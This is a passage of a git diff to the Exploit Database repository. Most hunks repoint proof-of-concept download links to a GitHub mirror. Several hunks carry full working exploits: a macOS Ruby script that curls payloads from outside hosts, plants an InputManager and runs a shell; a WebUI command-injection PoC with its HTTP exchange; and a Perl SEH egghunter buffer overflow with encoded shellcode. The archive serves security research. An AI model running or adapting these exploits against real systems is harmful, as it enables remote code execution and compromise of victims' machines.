+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36570.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/9731.txt b/platforms/multiple/dos/9731.txt
index 9e54eef02..45efda523 100755
--- a/platforms/multiple/dos/9731.txt
+++ b/platforms/multiple/dos/9731.txt
@@ -20,5 +20,5 @@ snort-2.8.4
snort-2.8.5.beta*
link: http://pablo-secdev.blogspot.com/2009/09/snort-28-285stable-unified1-output-bug.html
-poc: http://www.exploit-db.com/archive/2009-snort-unified1_bug.tar.gz
+poc: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/2009-snort-unified1_bug.tar.gz
# milw0rm.com [2009-09-21]
\ No newline at end of file
diff --git a/platforms/multiple/remote/22509.txt b/platforms/multiple/remote/22509.txt
index c3d210485..999a88112 100755
--- a/platforms/multiple/remote/22509.txt
+++ b/platforms/multiple/remote/22509.txt
@@ -15,7 +15,7 @@ potential damage to their assets caused by Sophos.
The paper is available to download at the link below.
https://lock.cmpxchg8b.com/sophailv2.pdf
-http://www.exploit-db.com/wp-content/themes/exploit/docs/22510.pdf
+http://www.exploit-db.com/docs/22510.pdf
A working exploit for Sophos 8.0.6 on Mac is available, however the
techniques used in the exploit easily transfer to Windows and Linux,
diff --git a/platforms/osx/local/3181.rb b/platforms/osx/local/3181.rb
index 9efb23f21..5a02ecde5 100755
--- a/platforms/osx/local/3181.rb
+++ b/platforms/osx/local/3181.rb
@@ -1,44 +1,44 @@
-#!/usr/bin/ruby
-# Copyright (c) 2007 Kevin Finisterre
-# Lance M. Havok
-# All pwnage reserved.
-#
-# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
-#
-
-require 'fileutils'
-
-bugselected = (ARGV[0] || 0).to_i
-
-# INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
-# keeping a local backup. /str0ke
-INPUTMANAGER_URL = "http://www.milw0rm.com/sploits/MOAB-22-01-2007_im.tar.gz"
-INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
- "mkdir -p ~/Library/InputManagers/;" +
- "cd ~/Library/InputManagers/;" +
- "tar -zxvf /tmp/moab_im.tar.gz"
-
-case bugselected
- when 0
- target_url = "http://projects.info-pull.com/moab/bug-files/notification"
- trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
- when 1
- target_url = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf"
- trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
- when 2
- target_url = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz"
- trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"
-end
-
-CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"
-
-def escalate()
- puts "++ Welcome to Pwndertino..."
- system CMD_LINE
- sleep 5
- system "/Users/Shared/shX"
-end
-
-escalate()
-
-# milw0rm.com [2007-01-23]
+#!/usr/bin/ruby
+# Copyright (c) 2007 Kevin Finisterre
+# Lance M. Havok
+# All pwnage reserved.
+#
+# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
+#
+
+require 'fileutils'
+
+bugselected = (ARGV[0] || 0).to_i
+
+# INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
+# keeping a local backup. /str0ke
+INPUTMANAGER_URL = "https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/MOAB-22-01-2007_im.tar.gz"
+INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
+ "mkdir -p ~/Library/InputManagers/;" +
+ "cd ~/Library/InputManagers/;" +
+ "tar -zxvf /tmp/moab_im.tar.gz"
+
+case bugselected
+ when 0
+ target_url = "http://projects.info-pull.com/moab/bug-files/notification"
+ trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
+ when 1
+ target_url = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf"
+ trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
+ when 2
+ target_url = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz"
+ trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"
+end
+
+CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"
+
+def escalate()
+ puts "++ Welcome to Pwndertino..."
+ system CMD_LINE
+ sleep 5
+ system "/Users/Shared/shX"
+end
+
+escalate()
+
+# milw0rm.com [2007-01-23]
diff --git a/platforms/php/webapps/17307.txt b/platforms/php/webapps/17307.txt
index c457d3894..b1b9ca5b5 100755
--- a/platforms/php/webapps/17307.txt
+++ b/platforms/php/webapps/17307.txt
@@ -16,4 +16,4 @@ step2.
Change request message to attacking file's post ID and file ID/name.
ex) http-request-message body : ~&postid=1&~~&threadid=1&divname=1-1-1-attach&fileid=2&filename=account.txt~
-Full Advisory: http://www.exploit-db.com/download_pdf/17307
\ No newline at end of file
+Full Advisory: http://www.exploit-db.com/docs/17307.pdf
\ No newline at end of file
diff --git a/platforms/php/webapps/36821.txt b/platforms/php/webapps/36821.txt
new file mode 100755
index 000000000..7fadef9a3
--- /dev/null
+++ b/platforms/php/webapps/36821.txt
@@ -0,0 +1,34 @@
+#[+] Author: TUNISIAN CYBER
+#[+] Title: WebUI Remote Code Execution Vulnerability
+#[+] Date: 21-04-2015
+#[+] Vendor: https://github.com/baram01/webui/
+#[+] Type: WebAPP
+#[+] Tested on: KaliLinux (Debian)
+#[+] Twitter: @TCYB3R
+#[+] Proof of concept: http://i.imgur.com/co9Qx0n.png
+-------------------------------------------------------------------------------
+p0c:
+
+http://site/webui/mainfile.php?username=USER&password=PASSWORD&_login=1&Logon=';echo system('command');'
+
+Live HTTP Header:
+http://192.168.186.129/webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27
+
+GET /webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27 HTTP/1.1
+Host: 192.168.186.129
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+
+HTTP/1.1 200 OK
+Date: Wed, 22 Apr 2015 13:20:23 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.39-0+deb7u2
+Content-Encoding: gzip
+Vary: Accept-Encoding
+Content-Length: 51
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html
\ No newline at end of file
diff --git a/platforms/php/webapps/697.c b/platforms/php/webapps/697.c
index f21521449..761040c7d 100755
--- a/platforms/php/webapps/697.c
+++ b/platforms/php/webapps/697.c
@@ -1,4 +1,4 @@
-// Compiled version: http://www.milw0rm.com/sploits/phpbbmemorydump.rar
+// Compiled version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/phpbbmemorydump.rar
// Source serv.cpp is at the bottom of the page - str0ke
// Notes from author:
@@ -724,6 +724,6 @@ serveur::~serveur()
*/
-
-
-// milw0rm.com [2004-12-17]
+
+
+// milw0rm.com [2004-12-17]
diff --git a/platforms/php/webapps/897.cpp b/platforms/php/webapps/897.cpp
index 413b42ed5..220dd7386 100755
--- a/platforms/php/webapps/897.cpp
+++ b/platforms/php/webapps/897.cpp
@@ -1,5 +1,5 @@
/* Paisterist's code was nice but heres mil's version.
- * precompiled: http://www.milw0rm.com/sploits/897.rar
+ * precompiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/897.rar
* Usage:
* bcc32 897.cpp
* and place the exe in your firefox profile dir.
@@ -72,6 +72,6 @@ int main()
free (buffer);
return 0;
-}
-
-// milw0rm.com [2005-03-24]
+}
+
+// milw0rm.com [2005-03-24]
diff --git a/platforms/windows/dos/15297.txt b/platforms/windows/dos/15297.txt
index a488018e4..152f17015 100755
--- a/platforms/windows/dos/15297.txt
+++ b/platforms/windows/dos/15297.txt
@@ -72,7 +72,6 @@ Double Frees are usually exploitable but in this case it doesnt look simple. The
Proof of Concept:
-http://www.exploit-db.com/application/15297
Vendor-Patch Status:
diff --git a/platforms/windows/dos/18755.c b/platforms/windows/dos/18755.c
index 156148a1c..fc196a6ba 100755
--- a/platforms/windows/dos/18755.c
+++ b/platforms/windows/dos/18755.c
@@ -16,7 +16,7 @@ http://www.whitecell.org/list.php?id=50
The shell code to acheive privilage esclation as per the article used the following steps
-http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf
+http://www.exploit-db.com/docs/18712.pdf
.
1) Use PslookupProcessId get system token
@@ -57,7 +57,7 @@ unsigned char hexcode[]="\x90\x90\x90\xcc\x90\x90\x90\x90";
/*
The shell code to acheive privilage esclation
-Add you shellcode here as per the article http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf
+Add you shellcode here as per the article http://www.exploit-db.com/docs/18712.pdf
the malware used the following method.
1) Wse PslookupProcessId get system token
diff --git a/platforms/windows/dos/19575.txt b/platforms/windows/dos/19575.txt
index c3faeca69..ed68d9d33 100755
--- a/platforms/windows/dos/19575.txt
+++ b/platforms/windows/dos/19575.txt
@@ -1,4 +1,4 @@
-Paper: http://www.exploit-db.com/wp-content/themes/exploit/docs/19527.pdf
+Paper: http://www.exploit-db.com/docs/19527.pdf
Security Research - .Net Framework Tilde Character DoS
diff --git a/platforms/windows/dos/36443.txt b/platforms/windows/dos/36443.txt
index df3b1f4e0..2858db911 100755
--- a/platforms/windows/dos/36443.txt
+++ b/platforms/windows/dos/36443.txt
@@ -8,4 +8,4 @@ Note: The impact of the unspecified vulnerability is not known. We will update t
Versions prior to Opera Web Browser 11.60 are vulnerable.
-http://www.exploit-db.com/sploits/36443.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36443.zip
\ No newline at end of file
diff --git a/platforms/windows/dos/36788.txt b/platforms/windows/dos/36788.txt
index 5ba3e73f5..c7d1c8070 100755
--- a/platforms/windows/dos/36788.txt
+++ b/platforms/windows/dos/36788.txt
@@ -64,4 +64,4 @@ Successful exploitation may allow execution of arbitrary code.
===========
http://protekresearchlab.com/exploits/PRL-2015-04.docx
-http://www.exploit-db.com/sploits/36788.docx
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36788.docx
diff --git a/platforms/windows/local/11093.rb b/platforms/windows/local/11093.rb
index efede765e..c09923bf2 100755
--- a/platforms/windows/local/11093.rb
+++ b/platforms/windows/local/11093.rb
@@ -1,5 +1,4 @@
# Exploit Title: [Soritong v1.0 Universal BOF-SEH (META)]
-# Software Link: #[http://www.exploit-db.com/downloads/a1def037869c831496bda3d81b0d06f5-soritong10.exe]
# Version: [V1.0]
# Tested on: [windows xp 2]
diff --git a/platforms/windows/local/12255.rb b/platforms/windows/local/12255.rb
index 7464c07d3..04ca2a251 100755
--- a/platforms/windows/local/12255.rb
+++ b/platforms/windows/local/12255.rb
@@ -79,5 +79,3 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
-
-
diff --git a/platforms/windows/local/14550.py b/platforms/windows/local/14550.py
index 29f815ed8..f166aaff1 100755
--- a/platforms/windows/local/14550.py
+++ b/platforms/windows/local/14550.py
@@ -1,7 +1,6 @@
# Exploit Title: Easy RM to MP3 2.7.3.700 Local Buffer Overflow (.m3u , .pls , .smi , .wpl , .wax , .wvx , .ram)
# Date: 4 / 8 / 2010
# Author: Oh Yaw Theng
-# Software Link: http://www.exploit-db.com/application/10642/
# Version: 2.7.3.700
# Tested on: Windows XP SP 1
# CVE : N / A
diff --git a/platforms/windows/local/14630.py b/platforms/windows/local/14630.py
index 03cd91355..d8db6b45c 100755
--- a/platforms/windows/local/14630.py
+++ b/platforms/windows/local/14630.py
@@ -6,7 +6,6 @@
# Coded By: Dr_IDE
# Found By: abhishek lyall
# Usage: Load the evil .m3u file and click on it.
-# Download: http://www.exploit-db.com/application/14612
# Tested On: Windows XPSP3
#
#################################################################
diff --git a/platforms/windows/local/14633.py b/platforms/windows/local/14633.py
index 1317a6200..437b34969 100755
--- a/platforms/windows/local/14633.py
+++ b/platforms/windows/local/14633.py
@@ -7,7 +7,6 @@
# you on this one ! :)
# Grtz to dookie2000ca :)
# Original Advisory: http://www.exploit-db.com/exploits/14517 (hadji samir)
-# Download: http://www.exploit-db.com/application/14517
# Platform: Windows XP SP3 En Professional - VirtualBox
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
diff --git a/platforms/windows/local/14651.py b/platforms/windows/local/14651.py
index 9bebbdb00..d59e9bf20 100755
--- a/platforms/windows/local/14651.py
+++ b/platforms/windows/local/14651.py
@@ -5,7 +5,6 @@
# Date: August 15, 2010
# Author: dijital1
# Original Advisory: http://www.exploit-db.com/exploits/14601 - abhishek lyall
-# Download: http://www.exploit-db.com/application/14601/
# Platform: Windows XP SP3 EN Professional - VMware
# Greetz to: Corelan Security Team, Exploit-db, OffSec
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
diff --git a/platforms/windows/local/15184.c b/platforms/windows/local/15184.c
index def2488f1..4e4ab9124 100755
--- a/platforms/windows/local/15184.c
+++ b/platforms/windows/local/15184.c
@@ -1,7 +1,6 @@
# Exploit Title: AudioTran SafeSEH+SEHOP all-at-once attack method exploit
# Date: 2010.10.1
# Author: x90c
-# Software Link: http://www.exploit-db.com/application/14961/
# Version: 1.4.2.4
# Tested on:
# - MS Win xp sp3 pro ko ( SafeSEH )
diff --git a/platforms/windows/local/17449.py b/platforms/windows/local/17449.py
index adbb5db9a..fd2b4947a 100755
--- a/platforms/windows/local/17449.py
+++ b/platforms/windows/local/17449.py
@@ -3,7 +3,6 @@
#[+]Exploit Title: FreeAmp 2.0.7 .PLS File Buffer Overflow Exploit
#[+]Date: 24\06\2011
#[+]Author: C4SS!0 G0M3S
-#[+]Software Link: http://www.exploit-db.com/application/17441/
#[+]Version: 2.0.7
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
diff --git a/platforms/windows/local/17473.txt b/platforms/windows/local/17473.txt
index 32748bb9a..bffb7c763 100755
--- a/platforms/windows/local/17473.txt
+++ b/platforms/windows/local/17473.txt
@@ -11,7 +11,7 @@
#It work reliably on IE9/FF4 and other browsers.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
- http://www.exploit-db.com/download_pdf/17469
+ http://www.exploit-db.com/docs/17469.pdf
# me : twitter.com/ponez
# also check here for The Persian docs of this methods and more :
http://www.0days.ir/article/
diff --git a/platforms/windows/local/17474.txt b/platforms/windows/local/17474.txt
index 623d1e567..b4915e65e 100755
--- a/platforms/windows/local/17474.txt
+++ b/platforms/windows/local/17474.txt
@@ -13,7 +13,7 @@ Exploit
# so just need to open open Office , and then open exploit after a few second and saw a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
-# http://www.exploit-db.com/download_pdf/17469
+# http://www.exploit-db.com/docs/17469.pdf
#
# me : twitter.com/ponez
# aslo check here for Persian docs of this methods and more :
diff --git a/platforms/windows/local/17634.pl b/platforms/windows/local/17634.pl
index f692afef9..997164109 100755
--- a/platforms/windows/local/17634.pl
+++ b/platforms/windows/local/17634.pl
@@ -3,7 +3,6 @@
#[+]Exploit Title: Free CD to MP3 Converter 3.1 Universal DEP Bypass Exploit
#[+]Date: 07\08\2011
#[+]Author: C4SS!0 G0M3S
-#[+]Software Link: http://www.exploit-db.com/application/15480/
#[+]Version: 3.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
diff --git a/platforms/windows/local/36424.txt b/platforms/windows/local/36424.txt
index 10b8d15b5..6f4ade975 100755
--- a/platforms/windows/local/36424.txt
+++ b/platforms/windows/local/36424.txt
@@ -41,4 +41,4 @@ Observed Result:
Authentication was successful as local system and a file written to the root of the C drive .
Proof of Concept:
-http://www.exploit-db.com/sploits/36424.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36424.zip
diff --git a/platforms/windows/local/36822.pl b/platforms/windows/local/36822.pl
new file mode 100755
index 000000000..93fbefc00
--- /dev/null
+++ b/platforms/windows/local/36822.pl
@@ -0,0 +1,135 @@
+#!/usr/bin/perl
+
+###########################################################################=
+#######################
+# Exploit Title: Quick Search 1.1.0.189 'search textbox' Unicode SEH egghunter Buffer Overflow
+# Date: 2015-04-23
+# Exploit Author: Tomislav Paskalev
+# Vulnerable Software: Quick Search v1.1.0.189
+# Vendor Homepage: http://www.glarysoft.com/
+# Software Link: https://www.exploit-db.com/apps/93feb6805c08d3ca84b0636a3a986a56-qsearchsetup.exe
+# Version: 1.1.0.189
+# Tested on: Windows XP SP2 EN
+# OSVDB-ID: 93445
+###########################################################################=
+#######################
+# Credits:
+# - Vulnerability identified by ariarat
+# http://www.exploit-db.com/exploits/25443/
+###########################################################################=
+#######################
+# Exploit development notes:
+# - instead of attaching the process, start the executable within the debugger
+# - the application's module gtms_D7.bpl was not compiled with SafeSEH
+# - since this is a unicode buffer overflow \x00 will not terminate the string
+# - 6 available unicode friendly P/P/R pointers within the module
+# - this exploit should work across different OS versions
+# (tested only on Win XP SP2 EN)
+# - several other unicode friendly aplication modules are available, but have not been checked
+###########################################################################=
+#######################
+# How to exploit:
+# - Quick Search -> (click arrow for menu) Match Path -> (click arrow for menu) Full Mode ->=20
+# (paste created exploit string into the search textbox)
+# - once the exploit string is pasted, the egghunter starts to search the memory for the marker
+# - on my test machine the search takes around 30 seconds (until the shellcode gets executed)
+# - during the search the mouse cursor will NOT have a hourglass displayed beside it
+# - during the search the application will NOT become unresponsive (i.e. it will be usable)
+###########################################################################=
+#######################
+# Thanks to:
+# - ariarat (PoC)
+# - Peter Van Eeckhoutte (exploit development tutorials)
+# - Offensive Security (IT security courses, admin support)
+###########################################################################=
+#######################
+
+my $junk = "A" x 21;
+
+# Egghunter code; NtAccessCheckAndAuditAlarm method; searches for "0t0t"
+# msfencode -e x86/alpha_mixed
+# msfencode -e x86/unicode_upper BufferRegister=3DEAX
+# converted to ASCII
+my $egghunter =
+"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
+"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
+"B9KHHHYCDO4KD1KB3QIQ9OY190IQ9PIQ9PI0IOS13PCPC1313PCOGB11J2J11R8R" .
+"0P01100OQRK11OQB102Q1OR02PB0BNP0BORQ11228PPP8Q1PBT50JQ9RUOF0M212" .
+"J1Z3IRO3F2O41QB1VP2S20J26RBP3BHRZ2MBVPNRGPLCCOESBCJ2C14482O2O18B" .
+"52000P02EB032PTBNBKR92J0L2OBR1E3ICJPLRO0B0URZ0G2KPO1I2W11Q1AA";
+
+my $fill = "C" x (1045 - length($junk.$egghunter));
+my $nextSEH = "\x41\x6d"; # INC ECX; INSW Yz DX
+my $SEH = "\x70\x34"; # POP POP RET from gtms_D7.bpl
+
+# jump to egghunter code
+my $allign = "\x58"; # POP EAX
+$allign = $allign."\x6d"; # NOP/remove NULL bytes
+$allign = $allign."\x58"; # POP EAX
+$allign = $allign."\x6d"; # NOP/remove NULL bytes
+$allign = $allign."\x58"; # POP EAX
+$allign = $allign."\x6d"; # NOP/remove NULL bytes
+$allign = $allign."\x05\x01\x11"; # ADD EAX, 0x11000100
+$allign = $allign."\x6d"; # NOP/remove NULL bytes
+$allign = $allign."\x2d\x09\x11"; # SUB EAX, 0x11000900
+$allign = $allign."\x6d"; # NOP/remove NULL bytes
+my $jumptoegghunter = "\x50"; # PUSH EAX
+$jumptoegghunter = $jumptoegghunter."\x6d"; # NOP/remove NULL bytes
+$jumptoegghunter = $jumptoegghunter."\xc3"; # RETN
+
+# fill the rest of the stack frame + padding (to avoid a memory area which coverts to upper alpha)
+my $fill2 = "D" x 500;
+
+# allign EAX and jump to shellcode
+# (this gets executed after the marker is found)
+my $allign2 = "\x6d"; # NOP/remove NULL bytes
+$allign2 = $allign2."\x57"; # PUSH EDI
+$allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
+$allign2 = $allign2."\x58"; # POP EAX
+$allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
+$allign2 = $allign2."\xb9\x1b\xaa"; # MOV ECX, 0xaa001b00
+$allign2 = $allign2."\xe8"; # ADD AL,CH (equivalent to adding "1b" (from the previous command)
+ # to the last two bytes of EAX; i.e. increase EAX with "1b")
+$allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
+$allign2 = $allign2."\x50"; # PUSH EAX
+$allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
+$allign2 = $allign2."\xc3"; # RETN
+
+# msfpayload windows/messagebox
+# msfencode -e x86/alpha_mixed
+# msfencode -e x86/unicode_upper BufferRegister=3DEAX
+# converted to ASCII
+my $shellcode =
+"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
+"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
+"BYKWTHY44MTZTQNPV29190IQ919PI19PIOY19Q3Q3PC13Q3PC13070QPZ2JQ1B8R" .
+"000Q10011RKOQQ10QOBOQ0BOBORQ200Q2Q2Q1Q2QHB0OHQ1Q2CEPJQ91JRY2XBKB" .
+"MPKPI19S3Q4NVQ40J0TBT2QOZRR0N0RPPD70TT1RJC9OEP4PN2KNQQQPD400N2KN" .
+"PSFQ4PLPNBKNT0615PL2NRKRPOV0418PNRKBSPNOW20PL0KBGQ6B51XPRRO2D0X0" .
+"Q35PLP3NS1YB3P11H0Q49BOR92QRQ40RL0KBPRLBD340UD4RNBK010UQW0L2N2KN" .
+"S343F18QBQHBFS1492Z0LPK0PPJB7QXBL0KBR3J2QNP33P1T8RKCJQ3OGPDQ3D9R" .
+"NBKPTSDBL0KBFQQOX2N4621PK0OR0NQD9R02KPL0N0LRKNTPKRP0RB4162G2I21N" .
+"XPO162M03NQ38OWNX2KQ9QTB7PKRSPL1QOD1F0HBQ2E2M01PNRK02CJ0UCDPF1QP" .
+"JPKP5OFBLPK16RLR0PK0N2KQCQZC50L1EPQCHBK0NRK45PTBN2K1CP1QX1XPOD9Q" .
+"ST4PE3DCE0LD3R1NX13NXP2C3NX1G1IBNODRK0948C5POSI2JQRQ5NX0L0NNR2N3" .
+"F2NBJ0LR3BBPK0XBMPO492OCIBO29RO0OSIT7P52D0D0MRKC1RNPJD8PY422C0CB" .
+"OBWSEPLP4341C2BB8QX0N2N0IBOQ92OD9BO2N1YPC45Q7RXNR0HB02L2PBLB1003" .
+"7NQ0148RVPS2F1B342NOC0TPUNXODOE221CNRQ51312PKNXP10LQFOTQ62J0MB92" .
+"MP61606NYBOBSBEBCODPLOYBO02CFNPPMBKPNOX2OQBC2BMPOPL2M0W1W2LNW24S" .
+"112BK1H41T11YBO29BO2KPO130X2PQHNQ00P1P0QGB0NS0XNRCDQEP531BC43OTR" .
+"0P12KRK0NRH410LD4BD45PT0LOY0JPCBBOXC2PNOF0N03BHPW0PR1D82PC1BDP43" .
+"5P9OB0OB508ODP00B0LS2PI030SD508NQSD370PC3PQP040D5P8020OOEOI0B1DN" .
+"PS5NUOHP31ER4OHPB0PT20L031HNS0D13B8BSB5NQ00P1BXQ70P3B0OPPQVBUT0S" .
+"B18OBB4320E012HT4ODPCR8QU40R30SRBPO32PNORQ8P5D0QQQTOENXR2PEPP38B" .
+"R0NPG20D0BIT0BNB5P80B251QS4T02IR0ROP038T30UP2B83CR5R3232B0HP20OR" .
+"3B4P0C5R1NPB1SH0EP5T5P41WR0Q5P3BBQ8P3BW03B1OCQINPRNP4T1SJ2IPO3HT" .
+"22LC724B3CBBN390MNQQ60QT912120J01R013C32CS1QS2B0KPOB8R03DBQ2K2PR" .
+"PPP0KPOBB3E0FQXOQOQAA";
+
+my $payload = $junk.$egghunter.$fill.$nextSEH.$SEH.$allign.$jumptoegghunter.$fill2."0t0t".$allign2.$shellcode;
+
+open(myfile,'>QuickSearch_egghunter_messagebox.txt');
+print myfile $payload;
+close(myfile);
+print "Wrote ".length($payload)." bytes\n";
+
diff --git a/platforms/windows/local/5442.cpp b/platforms/windows/local/5442.cpp
index c4637a056..2de7e27c1 100755
--- a/platforms/windows/local/5442.cpp
+++ b/platforms/windows/local/5442.cpp
@@ -10,6 +10,6 @@
/// calc will not be run.
/////////////////////////////////////////////////////////////
-http://www.milw0rm.com/sploits/2008-exploit_08021.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-exploit_08021.zip
// milw0rm.com [2008-04-14]
diff --git a/platforms/windows/remote/12495.pl b/platforms/windows/remote/12495.pl
index d20d66415..f83595427 100755
--- a/platforms/windows/remote/12495.pl
+++ b/platforms/windows/remote/12495.pl
@@ -1,7 +1,6 @@
# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Date: 03.05.2010
# Author: Alexey Sintsov
-# Software Link: http://www.exploit-db.com/application/11618
# Version: 1.2
# Tested on: Windows XP SP3 / Windows 7
# CVE :
diff --git a/platforms/windows/remote/15016.rb b/platforms/windows/remote/15016.rb
index c1a6aba76..2bc1df989 100755
--- a/platforms/windows/remote/15016.rb
+++ b/platforms/windows/remote/15016.rb
@@ -1,7 +1,6 @@
# Exploit Title: Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)
# Date: 2010-09-15
# Author: Node
-# Software Link: http://www.exploit-db.com/application/14941
# Version: Race River Integard Pro 2.2.0.9026, integard32.dll(v.2.0.0.306)
# Tested on: Windows 7 x64 Eng
# CVE : -
diff --git a/platforms/windows/remote/157.c b/platforms/windows/remote/157.c
index c0fd5fef2..2fd4bc0cf 100755
--- a/platforms/windows/remote/157.c
+++ b/platforms/windows/remote/157.c
@@ -265,6 +265,6 @@ return;
}
}
-
-
-// milw0rm.com [2004-02-27]
+
+
+// milw0rm.com [2004-02-27]
diff --git a/platforms/windows/remote/36491.txt b/platforms/windows/remote/36491.txt
index 7075c5654..b7dd860c6 100755
--- a/platforms/windows/remote/36491.txt
+++ b/platforms/windows/remote/36491.txt
@@ -1,6 +1,6 @@
Source: https://github.com/SecurityObscurity/cve-2015-0313
-PoC: http://www.exploit-db.com/sploits/36491.zip
+PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36491.zip
Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit
diff --git a/platforms/windows/remote/36542.txt b/platforms/windows/remote/36542.txt
index cc5efb725..d3bd90818 100755
--- a/platforms/windows/remote/36542.txt
+++ b/platforms/windows/remote/36542.txt
@@ -6,4 +6,4 @@ Successful attacks will allow attackers to execute arbitrary code within the con
ExpressView Browser Plug-in 6.5.0.3330 and prior versions are vulnerable.
-http://www.exploit-db.com/sploits/36542.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36542.zip
\ No newline at end of file
diff --git a/platforms/windows/remote/36546.txt b/platforms/windows/remote/36546.txt
index a4ecc63fd..f29143b3f 100755
--- a/platforms/windows/remote/36546.txt
+++ b/platforms/windows/remote/36546.txt
@@ -6,4 +6,4 @@ Successfully exploiting this issue may allow attackers to execute arbitrary code
GreenBrowser 6.0.1002 and prior versions are vulnerable.
-http://www.exploit-db.com/sploits/36546.rar
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36546.rar
\ No newline at end of file
diff --git a/platforms/windows/remote/418.c b/platforms/windows/remote/418.c
index 48e3241d1..b58a8b192 100755
--- a/platforms/windows/remote/418.c
+++ b/platforms/windows/remote/418.c
@@ -2,7 +2,7 @@ This 0day exploit is known to be circulating in the wild
There is no patch for this vulnerability -> Do not use Winamp !
-http://www.milw0rm.com/sploits/skinhead.rar (171 Ko)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/skinhead.rar (171 Ko)
index.html
diff --git a/platforms/windows/remote/986.html b/platforms/windows/remote/986.html
index 1d7fc55fd..41d13aa6f 100755
--- a/platforms/windows/remote/986.html
+++ b/platforms/windows/remote/986.html
@@ -1,5 +1,5 @@